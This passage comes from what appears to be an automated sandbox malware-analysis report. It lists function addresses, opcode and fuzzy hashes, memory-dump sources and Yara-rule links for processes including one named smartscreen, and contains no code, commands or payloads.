                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b8c1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction ID: dd2fa252bd044f90bfe0c48d71cca4bcdfc65ff6de01196c9be09c8a8df5d479
                                                                                                                            • Opcode Fuzzy Hash: ab9562f4afc654ad43cb676b16cd503151af6ef77b6da7b3baf5e01dc5b9db0a
                                                                                                                            • Instruction Fuzzy Hash: 56D0A73194B5844FCB0AAB3584A8C707F50DF5A20474940EDC04A8F1B2D9259949C700
                                                                                                                            Function 00007FFD9B891270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: 37d56fc8bf9c5039ec7b7fcad5045d6e65fb4e6495ea3a13e890c7ad575b7a3f
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: BCC0123461180C8FCE48EB28C894D14B7A0FB1D308B960094E40DCB2B1E62AECC2CB40
                                                                                                                            Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 273191246111428e40a431a7a54f12b9d089d306f6e8a9bf204ffb7757e5edd1
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: C4C04C06F7B65F01FC3A73EE98660ACA9405FDDE14FD70172D54D400E19D4D22D5015A
                                                                                                                            Function 00007FFD9B8A4CA2 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b8a0000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction ID: 9a838bcee849822155eb1aab13ca98329973e27e25f0df731afb868c8a01095f
                                                                                                                            • Opcode Fuzzy Hash: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction Fuzzy Hash: 25D0C731B0950D8BDE59EB8494607797251EF4C344F150479D81E831D7DE2569538611
                                                                                                                            Function 00007FFD9B892A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2a3ceb3f6b32e1819ed66f76c3dfdd35f073259c2cfc49530c881d727d26c0c4
                                                                                                                            • Instruction ID: be715f778eb9954e26df6ff57374874ee47e4be3f9c3bd458b6fad6ccf0576cb
                                                                                                                            • Opcode Fuzzy Hash: 2a3ceb3f6b32e1819ed66f76c3dfdd35f073259c2cfc49530c881d727d26c0c4
                                                                                                                            • Instruction Fuzzy Hash: 74C08C00F0C81A02E71A3308442023E04138F48344F880470E01EE33CECC5D6D0202C3
                                                                                                                            Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: b4fc1ea5d6783b844f0b641cbd262a33b41a6ab9518781fdcb408edd7a7f3afa
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: ECB00205D7744F01EC7C33FA195616978945B4D514FD61170D84D50195984D16951256

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.2241473727.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction ID: e6b196baa473aecd27b0473277671d06a4999512242d139f993a0ee3a99db811
                                                                                                                            • Opcode Fuzzy Hash: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction Fuzzy Hash: 8B41D087B1957685E31F33FC79299ED9B84CF8127DB0846B7E15E8A0C7AC88608293D5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B890D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: adeeecb372eb57668a155ed4f60f32448c5295943c80f86d94a8f76e2cc2029b
                                                                                                                            • Instruction ID: 39763bd7d9cd2dc68a4294e1ad2ad381cbe6c8fa3d8e878c04f6c45de34c2aad
                                                                                                                            • Opcode Fuzzy Hash: adeeecb372eb57668a155ed4f60f32448c5295943c80f86d94a8f76e2cc2029b
                                                                                                                            • Instruction Fuzzy Hash: 9E912471A19A8D8FEB99EBA898657B8BFE1FF59310F0000BAD049D32E6CB791401C741
                                                                                                                            Function 00007FFD9B8906F2 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =N_^
                                                                                                                            • API String ID: 0-3908133570
                                                                                                                            • Opcode ID: b9f9e82a7de8ab4d83530fc9bd280e62ff117d2852da6803225db2a1ea46e8c1
                                                                                                                            • Instruction ID: ae52e8ece1f7f07cbc2378910d09caef33cdd6171025420dd79cfa7c692c00df
                                                                                                                            • Opcode Fuzzy Hash: b9f9e82a7de8ab4d83530fc9bd280e62ff117d2852da6803225db2a1ea46e8c1
                                                                                                                            • Instruction Fuzzy Hash: 68D0A770F544088FCB41A72B8CD45547BE0FF0D104BD910E0D11DC7321F21ADC094B05
                                                                                                                            Function 00007FFD9B8908D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 92fa8e502297b9a2a81607b1191f6a34e5d85ce1c103f8dc0c9e24b8a3286569
                                                                                                                            • Instruction ID: cc18bdc32ee901b878f0e2ed8c65753c87c503feb17ba03ec3bbd56629b36fc0
                                                                                                                            • Opcode Fuzzy Hash: 92fa8e502297b9a2a81607b1191f6a34e5d85ce1c103f8dc0c9e24b8a3286569
                                                                                                                            • Instruction Fuzzy Hash: D0412922B0C5294FE71DB7B874696F97B81EF89329B0404FBD04EC71EBDD18A8428285
                                                                                                                            Function 00007FFD9B890C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 42b40ac16ec918fa9b47fdfa1eba563f88422d284308d2f012e9e18478f07ec2
                                                                                                                            • Instruction ID: 5b1915ef2f1038f4112747bf3d5e07c8d231045fc8a9badfbb20452c39266217
                                                                                                                            • Opcode Fuzzy Hash: 42b40ac16ec918fa9b47fdfa1eba563f88422d284308d2f012e9e18478f07ec2
                                                                                                                            • Instruction Fuzzy Hash: 8F310832B1E25D8BEB26ABA89C651EC7F60EF45724F0541F7D0588B1D3D93826868781
                                                                                                                            Function 00007FFD9B890998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 49143505a1c67663f434c94a314578a467eda9a677f0ecc9a48897bc74830a58
                                                                                                                            • Instruction ID: fc8a0dc3e0b0cb81dc82c7e3870b3c0262906767d1344755472674cea7558040
                                                                                                                            • Opcode Fuzzy Hash: 49143505a1c67663f434c94a314578a467eda9a677f0ecc9a48897bc74830a58
                                                                                                                            • Instruction Fuzzy Hash: F3212920F1C91D0FEB98F7AC546A679B6C6EB9C355F4100BAE40EC33E7DD19AC424245
                                                                                                                            Function 00007FFD9B890BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 44d7b605e2e272dc78823a7f8d400a393d4293fa02f73a6229ebdf4781ce42bb
                                                                                                                            • Instruction ID: 5eccbe7a2282b1673c909b939f5df60d389fd395f86899749869a94f90ccab87
                                                                                                                            • Opcode Fuzzy Hash: 44d7b605e2e272dc78823a7f8d400a393d4293fa02f73a6229ebdf4781ce42bb
                                                                                                                            • Instruction Fuzzy Hash: 5901D861A1D026CAD71A33ACF9654EC3B50DF4532DB4941F3D01D8A0E39D58648AD395
                                                                                                                            Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7fa505ea11c0959ff60b465bd860ed53336fd62f33554f59ff4309fc6ecf56c5
                                                                                                                            • Instruction ID: 8c57689275c7ebc865757f116c071431659f5d09af5750fe2106236290723928
                                                                                                                            • Opcode Fuzzy Hash: 7fa505ea11c0959ff60b465bd860ed53336fd62f33554f59ff4309fc6ecf56c5
                                                                                                                            • Instruction Fuzzy Hash: 6111C432F1E68D8FEB12DBA8886009D7FB0EF56714F0641F7D054DB2A2D938674A8780
                                                                                                                            Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 19173cb53eea4553e79b55c5ad4a5c787908ee0d645090c2d6f13b83b86c735f
                                                                                                                            • Instruction ID: 65426e9ce2c1783a10a225f7b26692bb335ee9cc86fdc001baa51139a17d43c0
                                                                                                                            • Opcode Fuzzy Hash: 19173cb53eea4553e79b55c5ad4a5c787908ee0d645090c2d6f13b83b86c735f
                                                                                                                            • Instruction Fuzzy Hash: AE019231E1E28DDFEB16DBA4886009D7FB0EF56714F1641F7D054DB2A2D93867498780
                                                                                                                            Function 00007FFD9B89696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90a04f62bd7ad111ef575aaebc766521148f1306c5412bdb397ebc29878e214a
                                                                                                                            • Instruction ID: 81c818640e8a1753428114a281c15932bfd9f6f3272e9ff8f28e4e5f8d52c151
                                                                                                                            • Opcode Fuzzy Hash: 90a04f62bd7ad111ef575aaebc766521148f1306c5412bdb397ebc29878e214a
                                                                                                                            • Instruction Fuzzy Hash: 0BF0E1759089188FDF54EF04C8A4E99B7E1FBA9355F014199D40DD7264DA34AE84CF81
                                                                                                                            Function 00007FFD9B894F9A Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction ID: c7a27d751ee4bb0caa009a7d9ef9fcac6cc712eaaaa197da6fa81df36c0e35d6
                                                                                                                            • Opcode Fuzzy Hash: 57be8222ba4c2beedd7fbd5c9be00369cdad668df1b32d2e97d25566a62fc264
                                                                                                                            • Instruction Fuzzy Hash: 2FE01231F1D51E8AFFF5A754C8643F966519F88300F1601B5D90EE72E5DD286F818740
                                                                                                                            Function 00007FFD9B890B92 Relevance: .0, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction ID: 3d46c1e4e994ab30134f43e8b85ff06eb873397390d080b3eacdeda5102c0f03
                                                                                                                            • Opcode Fuzzy Hash: 7f4fdd7b36c35654760b3b1d02b807360b3405a1984611a69424e97fd24046d5
                                                                                                                            • Instruction Fuzzy Hash: D3D0A73166EA8E8FEB02B778DC5A4547FA0EF1F215FDA10E2D008CB5B2D5055999C701
                                                                                                                            Function 00007FFD9B891270 Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: 37d56fc8bf9c5039ec7b7fcad5045d6e65fb4e6495ea3a13e890c7ad575b7a3f
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: BCC0123461180C8FCE48EB28C894D14B7A0FB1D308B960094E40DCB2B1E62AECC2CB40
                                                                                                                            Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: 273191246111428e40a431a7a54f12b9d089d306f6e8a9bf204ffb7757e5edd1
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: C4C04C06F7B65F01FC3A73EE98660ACA9405FDDE14FD70172D54D400E19D4D22D5015A
                                                                                                                            Function 00007FFD9B890708 Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b63984426b2a1676838d1df9c3340233a227460230fb8d057db7f85ab17683e1
                                                                                                                            • Instruction ID: a3245d79e56d52aecacf45aacd1b99d63e9ed29f2a918c67f9a6ccd5d02edfb4
                                                                                                                            • Opcode Fuzzy Hash: b63984426b2a1676838d1df9c3340233a227460230fb8d057db7f85ab17683e1
                                                                                                                            • Instruction Fuzzy Hash: 17C04C305218098FCA54E77AC8899547AA0FB4D205BD610D0E409C7161E65AD9548B41
                                                                                                                            Function 00007FFD9B892A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7f911d92e43e16b24835623795e6c464258ae7e7ff0ff940679f59dddb9670c3
                                                                                                                            • Instruction ID: f135e24d4faa3ed8ec9b74f8e94ef776050a12c710eafbe3045d12d46fdb8db3
                                                                                                                            • Opcode Fuzzy Hash: 7f911d92e43e16b24835623795e6c464258ae7e7ff0ff940679f59dddb9670c3
                                                                                                                            • Instruction Fuzzy Hash: AAC04C10F1CC1A16F76A7754542167E44539B44644F950475E41EE73CECD5E6D1202C7
                                                                                                                            Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: b4fc1ea5d6783b844f0b641cbd262a33b41a6ab9518781fdcb408edd7a7f3afa
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: ECB00205D7744F01EC7C33FA195616978945B4D514FD61170D84D50195984D16951256

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.2186137688.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b890000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction ID: e6b196baa473aecd27b0473277671d06a4999512242d139f993a0ee3a99db811
                                                                                                                            • Opcode Fuzzy Hash: 253458a10e497b6783f913fce76b30542d0bb61413d7d333b974f08ca032dd70
                                                                                                                            • Instruction Fuzzy Hash: 8B41D087B1957685E31F33FC79299ED9B84CF8127DB0846B7E15E8A0C7AC88608293D5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B870D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aea10313df580770452e878f1d015dca0cce054ad153be0b2c08d0a7f87a9169
                                                                                                                            • Instruction ID: 5eceab0f4541123eb4642f410f21db5bd077c58779cd6e09a2b4b0e8724c9b79
                                                                                                                            • Opcode Fuzzy Hash: aea10313df580770452e878f1d015dca0cce054ad153be0b2c08d0a7f87a9169
                                                                                                                            • Instruction Fuzzy Hash: 28910771A19A4D8FEB58DB6888A9BF97FE1FF59318F4001BAD049D32E6DB781401C741
                                                                                                                            Function 00007FFD9B8A15A9 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 44d47399855b4f718b812f194e8d5246f00a2cc44449accc9c886139efeaf4d2
                                                                                                                            • Instruction ID: 7efd1b55e3c95c8abdead7d54391fbc7676390804a60c7a0156887f05cbb413a
                                                                                                                            • Opcode Fuzzy Hash: 44d47399855b4f718b812f194e8d5246f00a2cc44449accc9c886139efeaf4d2
                                                                                                                            • Instruction Fuzzy Hash: 70112C71E0F7884FD765EB7888A90987FB0EF1A300B4A45EBC049CB0A3EE29D945C741
                                                                                                                            Function 00007FFD9B8AB089 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 22fcb8aafadc907cf4429b3ab6e086b6b281421009128fe4e7aa59c141c9d6fb
